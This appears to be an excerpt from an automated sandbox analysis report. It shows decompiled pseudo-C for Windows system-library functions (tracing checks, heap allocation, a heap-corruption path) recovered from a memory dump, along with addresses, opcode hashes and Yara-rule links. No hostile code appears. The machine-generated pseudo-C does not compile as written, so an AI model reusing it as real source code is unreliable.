Instruction Fuzzy Hash: F701F732A00A08DBDB14EF79CC019FE77A8EFC0B30F954069A905A7245DE31DD45E791

Uniqueness

Uniqueness Score: -1.00%

Function 00FE1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E00FE165E(__ebx, 0x1008ae4, (__edx -  *0x1008b04 >> 0x14) + (__edx -  *0x1008b04 >> 0x14), __edi, __ecx, (__edx -  *0x1008b04 >> 0x14) + (__edx -  *0x1008b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E00FDAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E00F37D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E00FCFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x00fe1074
0x00fe1080
0x00fe1082
0x00fe108a
0x00fe108f
0x00fe1093
0x00fe10ab
0x00fe10ab
0x00fe10c3
0x00fe10cf
0x00fe10e1
0x00fe10d1
0x00fe10da
0x00fe10da
0x00fe10e9
0x00fe10f5
0x00fe10f5
0x00fe10fe

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e3cbc8ec1c7ea2bf794a0e9742faf4962194de25f0cad7db90dd124e544d1cd
Instruction ID: 1b8f8bc8833df5991529293e2d09b55488c45087b157db5c82ce8c86c1fd422a
Opcode Fuzzy Hash: 3e3cbc8ec1c7ea2bf794a0e9742faf4962194de25f0cad7db90dd124e544d1cd
Instruction Fuzzy Hash: 2D014C729047819FC721EF2ACD01B1B77D5BBC4320F04C529F98583691DE34D984EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F2B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F2B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E00F37D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E00F97016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x00f2b037
0x00f2b039
0x00f2b03b
0x00f2b040
0x00f7a60e
0x00000000
0x00000000
0x00f7a61d
0x00f2b04b
0x00f2b04e
0x00f7a627
0x00f7a634
0x00000000
0x00000000
0x00f7a641
0x00f7a653
0x00f7a643
0x00f7a64c
0x00f7a64c
0x00f7a65b
0x00000000
0x00000000
0x00000000
0x00f7a66c
0x00f2b057
0x00f2b057
0x00f2b057
0x00f2b046
0x00f2b046
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 0208ddc6f83920904712753a2bafd87b584b7b49cdd219e7470a1165c05476a2
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 140171726046849FD326D75CD944F6B77E8EB85760F0D40A1F919CB651D728DC40E622

Uniqueness

Uniqueness Score: -1.00%

Function 00FCFEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00FCFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x100d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00F5FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E00F37D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x00fcfec0
0x00fcfec0
0x00fcfecf
0x00fcfed9
0x00fcfede
0x00fcfee0
0x00fcfeeb
0x00fcfef3
0x00fcfef6
0x00fcfef9
0x00fcff04
0x00fcff16
0x00fcff06
0x00fcff0f
0x00fcff0f
0x00fcff21
0x00fcff22
0x00fcff24
0x00fcff29
0x00fcff3e

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f007eecb2026e7eb8586d7c063e1ff406d228f179fc549d8f8d4ce4170ac848
Instruction ID: a1fc1a41500d14570e7524156687bb1926383abefef2a5d2bba418c4c8a0207b
Opcode Fuzzy Hash: 1f007eecb2026e7eb8586d7c063e1ff406d228f179fc549d8f8d4ce4170ac848
Instruction Fuzzy Hash: 22018871E00208ABC714DBA9D846FAEB7B8EF44710F00406ABD009B291DA74D905D795

Uniqueness

Uniqueness Score: -1.00%

Function 00FCFE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00FCFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x100d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00F5FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E00F37D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x00fcfe3f
0x00fcfe3f
0x00fcfe4e
0x00fcfe58
0x00fcfe5d
0x00fcfe5f
0x00fcfe6a
0x00fcfe72
0x00fcfe75
0x00fcfe78
0x00fcfe83
0x00fcfe95
0x00fcfe85
0x00fcfe8e
0x00fcfe8e
0x00fcfea0
0x00fcfea1
0x00fcfea3
0x00fcfea8
0x00fcfebd

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5256f723560ac1e2ac178102c02091b46b8c56fe33f21e086d34d1c9abc95b73
Instruction ID: 71696c9d24a1256746853d7f9783451606d285a5767c6504ce591c92967be606
Opcode Fuzzy Hash: 5256f723560ac1e2ac178102c02091b46b8c56fe33f21e086d34d1c9abc95b73
Instruction Fuzzy Hash: 57018871E04218ABC714EFA9D846FAEB7B8EF44710F004066BD009B291DA74DA05D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00FE8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x100d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E00F37D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x00fe8ed6
0x00fe8ee5
0x00fe8eed
0x00fe8ef0
0x00fe8efa
0x00fe8f03
0x00fe8f0c
0x00fe8f15
0x00fe8f24
0x00fe8f27
0x00fe8f31
0x00fe8f43
0x00fe8f33
0x00fe8f3c
0x00fe8f3c
0x00fe8f4e
0x00fe8f4f
0x00fe8f51
0x00fe8f56
0x00fe8f69

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd47f8725ee1109c65a8b7bd45582677c1d0c1148760b418a2225d7a1e466795
Instruction ID: ce111bafc4ffdc04ea76724537c0d43bc118ec65963842146a5185a283c707af
Opcode Fuzzy Hash: dd47f8725ee1109c65a8b7bd45582677c1d0c1148760b418a2225d7a1e466795
Instruction Fuzzy Hash: E0111270D042499FD704DFA9D441BADB7F4FF08300F1442A6E918EB342D7389941DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00FE8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x100d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E00F37D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00F5B640(E00F59AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x00fe8a62
0x00fe8a71
0x00fe8a79
0x00fe8a82
0x00fe8a85
0x00fe8a89
0x00fe8a8c
0x00fe8a8f
0x00fe8a92
0x00fe8a95
0x00fe8a9f
0x00fe8ab1
0x00fe8aa1
0x00fe8aaa
0x00fe8aaa
0x00fe8abc
0x00fe8abd
0x00fe8abf
0x00fe8ac4
0x00fe8ada

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74757960ddd3076057c5c930030979706e81c9f04c6a6eab49d42ebae6335060
Instruction ID: ac64bbec2f0d7750318191d35e1a76f9be8e7e248a2aa2878bb2bc2a254a9c1f
Opcode Fuzzy Hash: 74757960ddd3076057c5c930030979706e81c9f04c6a6eab49d42ebae6335060
Instruction Fuzzy Hash: F3012171A0021CAFCB04EFA9D9419AEB7B8EF48750F10405AF904E7341DB38A901DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F1DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F1DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E00F1DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E00F1E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L00F1E8B0(__ecx, _t14, 0xfff);
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x00f1db64
0x00f1db66
0x00f1db6b
0x00f1dbaa
0x00f1db71
0x00f1db76
0x00f1db7a
0x00f1dba3
0x00f1db7c
0x00f1db87
0x00f1db8b
0x00f74fa1
0x00f74fb3
0x00f74fb8
0x00f1db91
0x00f1db96
0x00f1db98
0x00f1db98
0x00f1db8b
0x00f1db7a
0x00f1db9d
0x00f1dba2

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 79d4a7861f39ea7e3d62da457827b2701c51ab37fd817a10fb321e1f68b10cab
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 96F0F6736096329BD336AA558C90FEBB6B58FC1B70F270036F5069B344CB648C42B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F1B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F1B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E00F37D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E00F37D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E00F97016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x00f1b1e8
0x00f1b1ea
0x00f1b1f3
0x00f74a17
0x00f1b1f9
0x00f1b1f9
0x00f1b1f9
0x00f1b201
0x00f74a21
0x00f74a2e
0x00000000
0x00000000
0x00f74a3b
0x00f74a4d
0x00f74a3d
0x00f74a46
0x00f74a46
0x00f74a55
0x00000000
0x00000000
0x00000000
0x00f1b20a
0x00f1b20a
0x00f1b20a
0x00f1b20a

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 54de6b4983aafac1ce806bc0c697f95a0f91cf282d0092242270a38db4221ecf
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 7301D132644684EBE3329B5DC804FA9BB98EF91760F0940A2F9188B6B2D77DDC40F215

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00FE8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x100d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E00F37D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x00fe8f6a
0x00fe8f79
0x00fe8f81
0x00fe8f84
0x00fe8f8b
0x00fe8f91
0x00fe8f94
0x00fe8f9e
0x00fe8fb0
0x00fe8fa0
0x00fe8fa9
0x00fe8fa9
0x00fe8fbb
0x00fe8fbc
0x00fe8fbe
0x00fe8fc3
0x00fe8fd6

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8787d17bc1655b97faba83e718cea9f685e60dafebc614fa8a0e815624f64a6
Instruction ID: c7104b21a948719a645d8587354b86bace5ae0ee188d5c809701f3a1a6c9a63c
Opcode Fuzzy Hash: d8787d17bc1655b97faba83e718cea9f685e60dafebc614fa8a0e815624f64a6
Instruction Fuzzy Hash: BB014474A0424CAFCB14EFA9D945AAEB7F4EF08300F108059B905EB381DB78DA00DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FD131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00FD131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x100d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E00F37D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x00fd131b
0x00fd132a
0x00fd1330
0x00fd1336
0x00fd133e
0x00fd1341
0x00fd1344
0x00fd134f
0x00fd1361
0x00fd1351
0x00fd135a
0x00fd135a
0x00fd136c
0x00fd136d
0x00fd136f
0x00fd1374
0x00fd1387

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 226fe563bd567706c560b9014afb22b9406e819330496d9e7ad581249d8e1172
Instruction ID: 90f39c7dd2e70b7e06b8655165375928728312b29a35ff35f3dde2bdb2522eb2
Opcode Fuzzy Hash: 226fe563bd567706c560b9014afb22b9406e819330496d9e7ad581249d8e1172
Instruction Fuzzy Hash: 85011D71A05208AFCB04EFA9D945AAEB7F4FF08700F10805AFD45EB341E6749A00DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00FD1608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00FD1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x100d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E00F37D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x00fd1608
0x00fd1617
0x00fd161d
0x00fd1625
0x00fd1628
0x00fd162b
0x00fd1636
0x00fd1648
0x00fd1638
0x00fd1641
0x00fd1641
0x00fd1653
0x00fd1654
0x00fd1656
0x00fd165b
0x00fd166e

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b803492737e758859e4aed92a737a7b38a9875dc19bbfe0e9a389e8fd1311885
Instruction ID: ed5edf80feb748b0a1ef13207c46a04723207fc0ff29f031bca9e05d69478603
Opcode Fuzzy Hash: b803492737e758859e4aed92a737a7b38a9875dc19bbfe0e9a389e8fd1311885
Instruction Fuzzy Hash: A3F04F71A04248EFCB14EFA8D846A6EB7B4AF04300F044059B905EB381E638D900DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00F3C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F3C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E00F3C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xef11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E00FE88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x00f3c577
0x00f3c57d
0x00f3c581
0x00f3c5b5
0x00f3c5b9
0x00f3c5ce
0x00f3c5ce
0x00f3c5ca
0x00000000
0x00f3c5ca
0x00f3c5c4
0x00f3c5c8
0x00000000
0x00000000
0x00000000
0x00f3c5ad
0x00000000
0x00f3c5af

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8756fc6c86644fb989e3d335b69264499e1b1a5742e1add70d4ec0c318971327
Instruction ID: 8b66fd1bd02f8374331024b7c57a4ce01aab9a6d02d142a6bcc248c003aeda16
Opcode Fuzzy Hash: 8756fc6c86644fb989e3d335b69264499e1b1a5742e1add70d4ec0c318971327
Instruction Fuzzy Hash: 05F0BEB3D156A49FD7B1EB68C404B227BE89B05770F5C84A7E90AA7201C7A4FC80E3D0

Uniqueness

Uniqueness Score: -1.00%

Function 00FD2073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FD2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E00FCFD22(__ecx);
				_t19 =  *0x100849c - _t3; // 0x429505b0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1008748; // 0x0
					if(__eflags <= 0) {
						E00FD1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1008724 & 0x00000004;
							if(( *0x1008724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1008724; // 0x0
					return E00FC8DF1(__ebx, 0xc0000374, 0x1005890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x00fd2076
0x00fd2078
0x00fd207d
0x00fd2083
0x00fd20a4
0x00fd20aa
0x00fd20ac
0x00fd20b7
0x00fd20ba
0x00fd20bc
0x00fd20c9
0x00fd20c9
0x00fd20d0
0x00fd20d2
0x00000000
0x00fd20d2
0x00fd20be
0x00fd20c3
0x00fd20c5
0x00fd20c7
0x00000000
0x00000000
0x00fd20c7
0x00fd20bc
0x00fd20d4
0x00fd2085
0x00fd2085
0x00fd20a3
0x00fd20a3

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701489c6587b682466fc818d22fb53a12c3ae539dc0ebd0555d99158167f610f
Instruction ID: 49a01ab4cf37f553073efdd6052262092107522e7b6d2a0fe8993ff089c6060c
Opcode Fuzzy Hash: 701489c6587b682466fc818d22fb53a12c3ae539dc0ebd0555d99158167f610f
Instruction Fuzzy Hash: 19F02736C151844ADE735B24650A3E13B86F765320F0D4047E4D017309C93D8C83FB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00FE8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x100d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E00F37D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x00fe8d34
0x00fe8d43
0x00fe8d4b
0x00fe8d4e
0x00fe8d52
0x00fe8d5c
0x00fe8d6e
0x00fe8d5e
0x00fe8d67
0x00fe8d67
0x00fe8d79
0x00fe8d7a
0x00fe8d7c
0x00fe8d81
0x00fe8d94

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ee10267dd6954752e936313200884627c31ddb6326518cbb302d1c51a47d289
Instruction ID: 24d1ae5f1052a347cf58181ce07dfaf1fc1a39a49a1997696e48bf839b6554a4
Opcode Fuzzy Hash: 9ee10267dd6954752e936313200884627c31ddb6326518cbb302d1c51a47d289
Instruction Fuzzy Hash: FBF0B470E0464CAFC714EFB9D842B6E77B4EF04300F108099F905EB291DA38D900D754

Uniqueness

Uniqueness Score: -1.00%

Function 00F5927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00F5927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E00F5FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E00F592C6(_t11, _t14);
				}
				return _t11;
			}

0x00f59295
0x00f59299
0x00f5929f
0x00f592aa
0x00f592ad
0x00f592ae
0x00f592af
0x00f592b0
0x00f592b4
0x00f592bb
0x00f592bb
0x00f592c5

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 2e82714fd62cf0637e724372c6640f3966009a8cd56b91457967760d22a655b8
